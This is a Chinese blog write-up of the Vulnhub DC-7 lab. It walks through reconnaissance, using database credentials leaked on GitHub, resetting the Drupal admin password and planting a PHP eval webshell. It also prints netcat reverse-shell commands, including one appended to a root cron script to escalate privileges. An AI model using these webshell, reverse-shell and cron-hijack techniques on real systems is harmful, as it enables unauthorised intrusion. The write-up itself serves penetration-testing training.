Vulhub 靶场 DC-7解析

最新推荐文章于 2024-03-27 20:01:53 发布
最新推荐文章于 2024-03-27 20:01:53 发布
阅读量911 收藏 22
点赞数 17
文章标签: 网络 服务器 vulnhub 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32277727/article/details/136538301
版权

一、环境搭建

kali的靶攻击机IP地址:192.168.200.14

DC-7靶机的IP地址:暂时未知

注意:靶机和攻击机应处于一个网卡下

通过MAC地址判断靶机DC-7的IP 地址

二、信息收集

1、探索网段内存活的主机

第一种方式:

arp-scan -l

1707095923_65c03773b9d21675191a4.png!small?1707095925152

第二种方式:

nmap -T4 -sP 192.168.200.0/24 -oN nmap200.sP

1707095931_65c0377b7685e161d3947.png!small?1707095932845

第三种方式:

netdiscover -i eth0 -r 192.168.200.0/24 #eth0代表网卡  -r代表网段

1707095942_65c037860904bedf75375.png!small?1707095943740

2、扫描站点开放的端口信息

nmap -p 1-65535 192.168.200.10

1707095950_65c0378e0b67b335682b3.png!small?1707095951229

开放的端口有80端口和22端口

3、扫描目录

1707095961_65c03799ae41c587b03c8.png!small?1707095962660

1707095966_65c0379e74381d6716eb6.png!small?1707095967376

1707095972_65c037a41df212d4ebd44.png!small?1707095973221

1707095978_65c037aa177d4e5e2ecfc.png!small?1707095979286

4、网站指纹

第一种方式,可以安装火狐插件

第二种方式,在kali当中执行命令

whatweb -v 192.168.200.10

登陆网站,通过火狐插件可以知道网站使用的CMS是Drupal

1707095987_65c037b3c5290b57c05b9.png!small?1707095988846

当然,可以看到网站欢迎界面的英文信息

DC-7引入了一些“新”概念,但我让你来弄清楚它们是什么。:-)
虽然这个挑战并不完全是技术性的,但如果你需要诉诸暴力或字典攻击,你可能不会成功。
你要做的就是跳出框框思考。
盒子外面的路。:-)  #可知口令爆破是行不通的

三、漏洞测试

社工手段

百度搜索账户名

1707095996_65c037bc60d3432aaf621.png!small?1707095997414

是github账户,点击进入

1707096006_65c037c608cef18c76a62.png!small?1707096006945

可以看到全是配置文件,然后从底部的英文翻译可以知道,找对地方了

1707096015_65c037cf77d6fc4bc1a6c.png!small?1707096016629

1707096022_65c037d6aff18d47b7cb8.png!small?1707096023705

得到数据库账户密码

账户名:dc7user
密码:MdR3xOgB7#dW
数据库名:Staff

1707096032_65c037e08e471ccc61a04.png!small?1707096033512

几个可能的突破点:

1 网站首页的搜索框,尝试直接查询passwd等文件或直接输入linux命令查看,都以失败收尾;

2 尝试扫描网站目录,没发现什么有价值的目录,倒是发现了robotx.txt文件,这个文件作为常见的可以让爬虫程序扫描的文件之一,控制是否想让爬虫去爬取本站信息;

3 对于robots.txt文件,对里面的目录或者文件都进行了访问查看,未发现有用的信息

1707096041_65c037e9ccb75e650e319.png!small?1707096043131

没啥有用的,从刚才的账号密码入手进行ssh连接,登陆成功之后,看看home目录下有什么其他账户的文件夹

ssh dc7user@192.168.200.10

1707096050_65c037f24f2b3740442ca.png!small?1707096051552

发现一个backups文件夹和一个mbox文件

进入backups文件夹,发现两个文件,但都是以gpg结尾的,gpg命令是用来加密文件的,加密后的文件都是乱码

1707096059_65c037fb8e4613613de7e.png!small

1707096075_65c0380bba3c2060ee19c.png!small?1707096077267

进入mbox中发现脚本文件的路径

1707096084_65c038141a2b538570d0c.png!small?1707096085162

dc7user@dc-7:~$ cd /opt/scripts

dc7user@dc-7:/opt/scripts$ cat backups.sh

主要信息:

Shell脚本文件 /opt/scripts/backups.sh

数据库文件:/home/dc7user/backups/website.sql

网站数据: /home/dc7user/backups/website.tar.gz

1707096093_65c0381dbb0a1955d607d.png!small?1707096095230

drush user-password admin --password="new_pass" 
#想要更改您的密码?就这么简单。
#记得执行命令前先切换到Drupal的目录下面。
cd /var/www/html/
#Drupal默认账户是admin  123456为我修改的密码。
drush user-password admin --password="123456"

网页都会存在一个admin账户,也可以在网页的登录界面进行尝试,提示修改成功

1707096101_65c03825c4dee161e0175.png!small?1707096102730

来到网站后台,使用admin/123456登录网站,成功登录

http://192.168.200.10/user/login

1707096110_65c0382e1eb22dccafd99.png!small?1707096111153

在Content—>Add content–>Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入

php介绍页面如下,模块包下载地址

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

依次点击

1707096126_65c0383e1fbd1f9f988f2.png!small?1707096127270

安装完之后,跳转,然后点击激活

1707096138_65c0384ae1c1fcc6c6f81.png!small?1707096139900

1707096145_65c0385104e3c8bc11863.png!small?1707096146062

1707096151_65c038572566cb9339972.png!small?1707096152250

对该页面进行编辑,添加一句话PHP代码,并保存为PHP代码

<?php
@eval($POST[123]);
?>

1707096160_65c038603e6931241dfda.png!small?1707096161521

欢迎页面是网站的首页,所以直接使用中国蚁剑连接网站,成功连接getshell

1707096169_65c038694af0983d03afc.png!small?1707096170533

反弹SHELL

习惯性的反弹了一次shell到kali,在这里不反弹shell到kali下面也可以在蚁剑虚拟终端上做下面步骤

在kali监听6666端口,并反弹shell到kali,切换shell外壳

nc -e /bin/bash 192.168.200.14 6666
nc -lvvp 6666
python -c 'import pty;pty.spawn("/bin/bash")'

1707096177_65c038719a4d6b944d5b9.png!small?1707096178786

当前用户是www-data,在/opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

1707096184_65c03878c71e4672650a6.png!small?1707096185739

提权

写入反弹shell代码到backups.sh脚本文件中,并在kali监听8899端口,等待计划任务执行,稍微等待后成功getshell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.200.14 8899 >/tmp/f" >> backups.sh

nc -lvvp 8899

1707096191_65c0387fea647e8028fb7.png!small?1707096193124

# 记得kali也要开启侦听

nc -lvvp 8899

等待之后…

1707096200_65c03888a9077763bfb6b.png!small?1707096202307

获得flag

黑战士安全
关注
  • 17
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DC系列漏洞靶场-渗透测试学习复现(DC-4)
W983079520的博客
12-02 1244
DC-4是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-4靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口)。 4 访
Vulnhub系列之DC7靶场详解
weixin_50053818的博客
05-30 1160
文章目录环境信息收集安装插件拿shell提权 环境 vulhub系列之DC7靶场 VMware虚拟机 kali 信息收集 由目标靶机的MAC地址得到目标IP为192.168.137.103,直接nmap扫描。 可以知道目标开放了80和22端口,直接进入网站。 进入网站发现CMS是drupal 8,在漏洞进行搜索,无果。所以只能查看网站。翻译一下首页的内容。 欢迎来到DC-7 DC-7引入了一些“新”概念,但我将让您弄清楚它们是什么。 ???? 尽管此挑战并不是技术性的全部,但如果您需要诉诸于暴力破
DC-7靶场
mlws1900的博客
03-27 1032
常规思路是用searchsploit找相关漏洞进行利用,看大佬wp发现查看漏洞发现不行,这个信息收集是在互联网上进行的,我们搜索下面这个作者的名字@DC7USER,可以看到如下内容。很多文章在这里就教用户去写小马了,但是需要在搜索栏搜索一下php这个插件是否开启,勾选并点击install,否则写的php代码不会被解析。同样,因为这个cms支持添加插件,看大佬的wp,要下载一个支持php的插件,然后写入shell。我们进入主界面,点击content,点击basic page,写入小马。
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3243
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
vulhub靶场搭建安装包,包含docker-compose安装包
02-01
使用这条命令西在docker-compose太慢了而且老失败 sudo curl -L ... 使用git clone https://github.com/vulhub/vulhub.git下载vulhub-master下载太慢了 我这边包需要下载的都提供了,助力你搭建vulhub靶场
vulhub靶场.zip
10-14
vulhub靶场
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
vulhub靶场文件(不用积分)
05-18
使用Vulhub一键搭建漏洞测试靶场,下载日期2020/05/18。 kali下安装命令 apt-get install docker.io apt-get install docker-compose cd cd /vulhub/flask/ssti service docker start docker-compose up -d
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
DC-7 靶场学习
akxnxbshai的博客
03-15 447
DC-7 靶场学习
DC-7靶机渗透测试
读书 买花 长大
04-30 374
DC-7
Vulnhub靶机DC-7
过期的秋刀鱼
08-09 540
打开中国 蚁剑连接,蚁剑要想连接就得知道,刚上传的一句话木马所在的位置。目录下看看,发现是一个登录页面,这个时候没有密码,也不知道账户名。文件,发现里面内容重复的很多,是一封邮件,有一个可执行的脚本,同样的,把靶机跟kali放在同一网段,(NAT模式)一个以root权限定期执行的备份任务,执行文件。,就需要从其他方向找突破口了。目录里,发现都是看不懂的,搜了一下。后缀格式,发现是一种加密的文件格式。的权限,发现所有人都可以执行此文件。查看都有什么文件 ,使用命令。这么个关键词,发现有一个。
DC-7的靶机渗透
m0_74950307的博客
10-27 72
创建用户: drush user-create username --mail=user@example.com --password="password"模块的地址:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz。可以看到是久违的ssh端口还有最常见的http端口,还等什么,肯定是域名呀!查看了别人的资料,几乎都是进行了社工,原因是这个网站又一个创作者的签名。和其他的靶机差不多:是一个http://192.168.13.134。
DC-7靶机进行渗透测试
zll___的博客
03-24 267
DC-7靶机进行渗透测试
DC-7靶机
Flamingo1998的博客
07-17 141
DC-7靶机
DC-7(drupal)靶机
qq_56726035的博客
07-20 142
再次记录一次drupal渗透。
vulnhub DC7 靶场练习
鸥鹭忘机
08-20 1758
前言 这次练习的靶机vulnhub平台下的DC系列靶机第7台,下载地址为https://www.vulnhub.com/entry/dc-7,356/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机中用暴力破解成功的概率非常小,我们需要开阔思路,寻找非技术上的方法。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集
vulnhub DC-7 靶机 渗透测试
小松博客
05-28 134
我们打开这个人的界面,发现一个在GitHub上的神秘链接。映入眼帘的就是一个config.php,并且拿到了数据库的账号密码。这个drush 原来是dupal 的命令,具体可以参考这个链接内容。我们查看一下这个backups.sh文件,这个命令很奇怪。执行ls,发现有一个backup文件夹和mbox文件。跳出框框思考,我们在网页下面发现一个神秘代码。拿到shell,查看自己有哪些权限。发现没有php模块,我们自己加一个。等了好几分钟,shell终于到了。端口发现,开放80,22。登陆,进入后台模块管理。
vulhub靶场cve-2019-14234
09-19
CVE-2019-14234是指vulhub靶场中的一个漏洞。这个漏洞是由于vulhub中的一个名为Fastjson的组件的安全缺陷引起的。Fastjson是一种广泛使用的Java JSON库,用于在Java应用程序中进行JSON转换。然而,Fastjson在处理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑战士安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值